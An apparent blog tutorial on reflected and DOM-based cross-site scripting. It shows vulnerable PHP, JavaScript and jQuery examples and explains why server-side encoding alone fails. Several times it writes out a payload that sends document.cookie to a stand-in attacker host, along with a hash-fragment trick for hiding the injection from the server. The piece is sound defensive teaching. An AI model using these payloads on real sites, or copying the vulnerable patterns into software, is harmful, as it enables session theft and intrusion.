Cross Site Scripting (or XSS for short) has been a known nasty in the arsenal of web attackers for quite a while now.
The basic principle for XSS is simple: if user supplied input is somehow reflected inside a web page without proper precautions (filtering / encoding / etc.), then it may be possible for this input to mess with the structure of the HTML document, which may in turn mean that it can be used to add malicious tags or attributes (usually resulting in javascript execution).
To illustrate this with a simple example, consider the following simple dynamic HelloWorld.php script:
<html>
<body>
<p>Hello <?php echo($_GET['who']); ?>!</p>
</body>
</html>
If we run this script from the url "http://url/HelloWorld.php?who=world", then we are greeted with a page containing the line:
"<p>Hello world!</p>"
However, if we wanted to, we could use the url to do something more evil.
Suppose we were to let an innocent victim click on the following link:
http://url/HelloWorld.php?who=<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
Then our victim would be presented with a piece of html containing the line:
<p>Hello <script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='+document.cookie;</script>!</p>
Which would redirect our victim to a en evil drive-by download page and give the attacker access to the victim's (confidential) cookie of the original site. We could even decide to be even more evil and construct an entire javascript application that turns the victim's browser into a botnet zombie.
Now, as I said, this kind of problem has been known, used, abused and defended against for quite some time. Traditionally, the way to deal with this situation was to use some sort of magic server side function that either stripped user input from any characters that could mess with the layout or re-encoded the dangerous characters in such a way that they become harmless in the context of html. In fact, the latter option is usually preferred over the former, as removal of characters invariably leads to loss of information, which in many situations can be considered a Bad Thing.
So, to return to our HelloWorld.php example, the traditional way of fixing it would be something along the lines of
[..]
<p>Hello <?php echo(htmlentities($_GET['who'])); ?>!</p>
[..]
where the function htmlentities() does our magic encoding.
Now this kind of approach was fine and dandy for a long time, when most if not all dynamic aspects of a page were determined server side. However, this is no longer the case. Although server side scripts still account for a fair amount of dynamism, client side scripting has slowly but steadily gaining popularity as the new source of Web Application Magic. This can be seen in the popularity and prevalence of javascript frameworks like jQuery, MooTools, Dojo, etc.
Of course, when a client side script starts messing with the contents / layout of a web page, it runs the risk of doing so in a way that leads to unintended results, such as the accidental addition of html tags or attributes that may once more lead to javascript execution.
For instance, we could implement the HelloWorld page using nothing html and javascript and once more do so in a dangerous way.
[...]
<p>Hello
<script>
var index = document.location.href.indexOf("?who=")+5;
var who = decodeURIComponent(document.location.href.substring(index));
document.write(who)
</script>
!</p>
[...]
Once more, we can use this page to inject a redirection to our evil page:
http://url/HelloWorld.html?who=<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
What is more, we can now use some trickery to avoid exposing our injection to the webserver. Suppose we were have our victim click the following link:
http://url/HelloWorld.html?who=world#<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='%2bdocument.cookie;</script>
Notice the hadded hashmark "#". In a URI, this symbol basically means that what follows is a piece of information that the browser can use to find a specific part in the webpage. As it is only relevant to the browser, browsers generally do not send the hashmark and anything after it to the webserver. So, if our victim were to click the link, the webserver would only see that somebody requested "http://url/HelloWorld.html?who=world", which it assumes is perfectly normal. The HTML, however, after evaluating the javascript would include a line
<p>Hello world#<script>document.location='http://evilurl/EvilDriveByDownloadAndCookieStealer.php?cookie='+document.cookie;</script>!</p>
Which still redirects our victim to our evil page.
As these kinds of client side generated XSS attacks are the result of manipulating the DOM (http://en.wikipedia.org/wiki/Document_Object_Model), they are called DOM based XSS attacks.
The way to prevent these kinds of attacks is once more a matter of properly encoding your output when working on untrusted inputs. Magic functions that will do this encoding for you exist for javascript just like they do for other languages (albeit in frameworks and not as default functions).
An interesting question arises once a page uses both server side and client side scripting to construct a page. If user input has been encoded by the server side scripts, should the client side scripts still treat them as untrusted? Some people would instinctively say "yes", because you are still dealing with user supplied input and user supplied definition cannot be trusted. Other would instinctively say "no", because double encoding tends to lead to messy and unpredictable outputs. My answer is a resounding "it depends", and I will show you why.
Recently, I came across a web page that adopted the latter approach. The page used a post parameter to do some server side application magic and then reflected said parameter again as the value of a hidden input. The reflected parameter had all of its interesting character properly encoded into their respective html entities so if I were to make a post with 'param=<script>alert("XSS")</script>', I would be presented with a piece of html like:
<input type="hidden" id="param" value="<script>alert("XSS")</script>"/>
So, I had no way of breaking out of the value attribute, let alone the input tag.
Curiously though, if I made the post using a browser and allowed all of the page's javascript to run, I was still presented with my XSS popup.

Going through the javascript, I found there was a little bit of jQuery that basically read
$('#someDiv').html('[some html]' + $('#param').val() + '[some other html]');
For those unfamiliar with jQuery, what this does is it takes the value attribute of our "param" input and puts it together with some other html as the InnerHTML of div "someDiv".
So, after this bit of javascript is evaluated, our HTML suddenly contains a line
<div id="someDiv">[some html]<script>alert("XSS")</script>[some other html]</div>
But wait! Wasn't our "param" encoded with HTML entities and stuff? Shouldn't that line have read
<div id="someDiv">[some html]<script>alert("XSS")</script>[some other html]</div>
and been safe to display?
Well, yes and no. Yes, the value of "param" was indeed properly encoded. However, this encoding is interpreted by the browser when it reads the value attribute and stores it into the string, so the string contains the value as it was interpreted, not necessarily as it was encoded: "<script>alert("XSS")</script>".
This kind of interpreting is done all the time by your browser, although not always as you would expect. How content of an attribute or a tag is interpreted and/or re-encoded depends on a combination of which accessor is used to retrieve the content and the tag/attribute that contains it. The id attribute is interpreted different from an anchor's href, for instance. And the way content of tags is interpreted changes depending on whether you use innerHTML or textContent.
I highly recommend playing around a bit with various combination of accessors, nestings and encodings.
To get you started I have included a little section that shows some of the ways in which the string "<<b>script>alert(1)<</b>/scr<br/>ipt>" can be interpreted.
<script>alert(1)</scr
ipt>
As you can see, these three accessors produce three completely different outputs, each of which contains at least one set of valid html tags (and therefor a possible source of XSS).
Because the way that data is interpreted by the browser is so heavily influenced by its context, it is nigh impossible to create a magic catch-all server side function that will turn untrusted user input into safe-for-javascript-manipulation sanitized data. This means that in order to create a safe web application, the client-side javascript needs to treat any input that can be influenced by the user as untrusted, even when it's already encoded server side. This means that before reflecting data on a web-page, you have to
1) determine the context in which the data is going to be reflected, so you can determine which character encodings appropriate and which are dangerous
2) determine the behaviour of the accessors you are using, so you know what kind of automatic character encoding conversions are applied when retrieving and/or reflecting the data
3) decode and/or re-encode the input in such a way that after the automatic conversions, the reflected output conforms to the appropriate encoding.
Of course, this can be abstracted by creating / using custom accessors that automatically apply decoding mechanisms for data retrieval and encoding mechanisms for data reflection, but that's an excercise I'll leave to the reader ;)
Happy hacking!